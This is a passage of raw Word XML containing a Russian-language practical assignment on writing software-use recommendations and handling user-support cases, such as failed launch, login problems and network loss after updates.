      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">формирование навыков </w:t>
      </w:r>
      <w:r w:rsidR="009C005D" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>разработки рекомендаций по эффективному использованию ПО</w:t>
      </w:r>
      <w:r w:rsidR="00AA4CC7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и описанию предоставляемых услуг технической поддержки ПО</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593BA2" w:rsidRPr="00617AC0" w:rsidRDefault="00593BA2" w:rsidP="007755F7">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DB6A4A" w:rsidRPr="00617AC0" w:rsidRDefault="00DB6A4A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidR="005B25E6" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отчет должен содержать рекомендации по эффективному использованию ПО</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00431529" w:rsidRPr="00617AC0" w:rsidRDefault="00431529" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00431529" w:rsidRPr="00617AC0" w:rsidRDefault="00431529" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 1. Разработать рекомендации по</w:t>
      </w:r>
      <w:r w:rsidR="00D5569E" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> эффективному использованию ПО: составить инструкцию пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2D93" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00AA2D93" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2D93" w:rsidRPr="00617AC0" w:rsidRDefault="00AA2D93" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Эффективность использования программного обеспечения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2D93" w:rsidRPr="00617AC0" w:rsidRDefault="00AA2D93" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Использование по назначению.</w:t>
      </w:r>
      <w:r w:rsidR="00060179" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">При нечетком понимании достижений технологической мысли у некоторых людей, не лишенных изобретательности, мышление находит неоптимальный способ решения задач, и даже какое-то время это им сходит с рук. Пока </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>коса не найдет на камень</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="00060179" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00060179" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">требования стандартизации, скорости выполнения работы или, наконец, требования к качеству работы выводят на свет </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>изобретателя</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>своей</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> технологии.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2D93" w:rsidRPr="00617AC0" w:rsidRDefault="00AA2D93" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Оптимальная структура рабочих каталогов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2D93" w:rsidRPr="00617AC0" w:rsidRDefault="00AA2D93" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.Профессиональное владение ПО.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2D93" w:rsidRPr="00617AC0" w:rsidRDefault="00AA2D93" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="00060179" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выполнение мер по защите и сохранению информации.</w:t>
      </w:r>
      <w:r w:rsidR="00060179" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Это выражается</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> в компонентах компьютерной культуры:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2D93" w:rsidRPr="00617AC0" w:rsidRDefault="00AA2D93" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>а) знание методологии применения ИиКТ в различных отраслях (управление, научно-исследовательская работа, преподавание и обучение);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2D93" w:rsidRPr="00617AC0" w:rsidRDefault="00AA2D93" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>б) понимание соответствующей терминологии, связанной с ИиКТ;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2D93" w:rsidRPr="00617AC0" w:rsidRDefault="00AA2D93" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>в) знание общих принципов устройства и работы компьютерной техники, периферийного оборудования к ней, а также логико-функциональной структуры;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2D93" w:rsidRPr="00617AC0" w:rsidRDefault="00AA2D93" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>г) знание конкретных примеров использования ИиКТ и перспектив их развития;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2D93" w:rsidRPr="00617AC0" w:rsidRDefault="00AA2D93" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>д) свободное владение навыками работы с компьютером и периферийным оборудованием к нему, а также применение их в повседневной профессиональной деятельности;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2D93" w:rsidRPr="00617AC0" w:rsidRDefault="00AA2D93" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е) знание основ методов моделирования (математического, логического, дидактического и др.);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2D93" w:rsidRPr="00617AC0" w:rsidRDefault="00AA2D93" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ж) понимание принципов, лежащих в основе функционирования телекоммуникационных сетей и умение квалифицированно ими пользоваться для решения различных задач;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2D93" w:rsidRPr="00617AC0" w:rsidRDefault="00AA2D93" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и) умение грамотно интерпретировать результаты решения практических задач с помощью электронно-вычислительной техники и применять их в своей деятельности;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2D93" w:rsidRPr="00617AC0" w:rsidRDefault="00AA2D93" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>к) умение грамотно сформулировать задачу, возникающую в своей деятельности и реализовывать на практике основные этапы ее решения (структуризация, алгоритмизация, программирование, отладка на ЭВМ, реализация);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2D93" w:rsidRPr="00617AC0" w:rsidRDefault="00AA2D93" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>л) соблюдение морально-этических и правовых норм применения ИиКТ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2D93" w:rsidRPr="00617AC0" w:rsidRDefault="00AA2D93" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Существует деление компьютерной культуры на общую и специальную</w:t>
      </w:r>
      <w:r w:rsidR="00060179" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> к общей компьютерной культуре относ</w:t>
      </w:r>
      <w:r w:rsidR="00060179" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>т навыки использования компьютерной техники и эрудицию в области создания для этого прикладных программ, а к специальной - знания, обеспечивающие возможность личности работать на стыке своей профессии с информатикой и вычислительной техникой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00060179" w:rsidRPr="00617AC0" w:rsidRDefault="00AA2D93" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:left="113" w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Алгоритмическая культура</w:t>
      </w:r>
      <w:r w:rsidR="00060179" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Заключается во </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>владени</w:t>
      </w:r>
      <w:r w:rsidR="00060179" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> основами алгоритмизации. </w:t>
      </w:r>
      <w:r w:rsidR="00060179" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Это сложное явление, включающее комплекс знаний, умений и навыков, предполагает:- знание правил пользования библиотекой;*- осознанный выбор тематики чтения;</w:t>
      </w:r>
      <w:r w:rsidR="007C2931" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00060179" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- ориентировку в библиотечно-библиографическом аппарате библиотеки;</w:t>
      </w:r>
      <w:r w:rsidR="007C2931" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00060179" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- систематичность и последовательность чтения, умение выбрать конкретную книгу;</w:t>
      </w:r>
      <w:r w:rsidR="007C2931" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00060179" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- знание правил гигиены-чтения;</w:t>
      </w:r>
      <w:r w:rsidR="007C2931" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00060179" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- владение приемами рационального чтения, обеспечивающими ориентировку в книге и максимальное усвоение и глубокое понимание прочитанного;</w:t>
      </w:r>
      <w:r w:rsidR="007C2931" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00060179" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- умение использовать и применять на практике полученную из источников информацию;</w:t>
      </w:r>
      <w:r w:rsidR="007C2931" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00060179" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- владение аналитическими приемами конспектирования, реферирования и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00060179" w:rsidRPr="00617AC0" w:rsidRDefault="00060179" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Культура речи (речевая культура). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00060179" w:rsidRPr="00617AC0" w:rsidRDefault="00060179" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Культура мышления. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00060179" w:rsidRPr="00617AC0" w:rsidRDefault="00060179" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Коммуникативная культура. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00060179" w:rsidRPr="00617AC0" w:rsidRDefault="00060179" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Культура диалога. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00060179" w:rsidRPr="00617AC0" w:rsidRDefault="00060179" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Экранная культура. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB6A4A" w:rsidRPr="00617AC0" w:rsidRDefault="00060179" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Интернет-культура (сетевая культура или Net-культура). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593BA2" w:rsidRPr="00617AC0" w:rsidRDefault="00593BA2" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Разработать рекомендации по безопасной и эффективной инсталляции программных продуктов отраслевой направленности.</w:t>
      </w:r>
      <w:r w:rsidR="00DB6A4A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Консультирование пользователей по вопросам установки и настройки программного обеспечения в модельной ситуации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593BA2" w:rsidRPr="00617AC0" w:rsidRDefault="00593BA2" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593BA2" w:rsidRPr="00617AC0" w:rsidRDefault="00593BA2" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Внимательно ознакомиться с подробным алгоритмом установки программного продукта.</w:t>
      </w:r>
      <w:r w:rsidR="00DB6A4A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На основе прочитанного документа выработать краткие рекомендации по установке ПО.</w:t>
      </w:r>
      <w:r w:rsidR="00DB6A4A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сформировать ответ, который может помочь разрешить моделируемую ситуацию.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593BA2" w:rsidRPr="00617AC0" w:rsidRDefault="00593BA2" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidR="00431529" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00431529" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Решить представленные задачи</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593BA2" w:rsidRPr="00617AC0" w:rsidRDefault="00593BA2" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задача №1</w:t>
      </w:r>
      <w:r w:rsidR="00DB6A4A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> У меня не получается запустить программное обеспечение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593BA2" w:rsidRPr="00617AC0" w:rsidRDefault="00593BA2" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задача №2</w:t>
      </w:r>
      <w:r w:rsidR="00DB6A4A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Во время работы было предложено обновить программное обеспечение. После обновления я не могу зайти под своим логином.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593BA2" w:rsidRPr="00617AC0" w:rsidRDefault="00593BA2" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задача №3</w:t>
      </w:r>
      <w:r w:rsidR="00DB6A4A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">После обновления программа не </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>видит</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> сеть.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00593BA2" w:rsidRPr="00617AC0" w:rsidRDefault="00593BA2" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
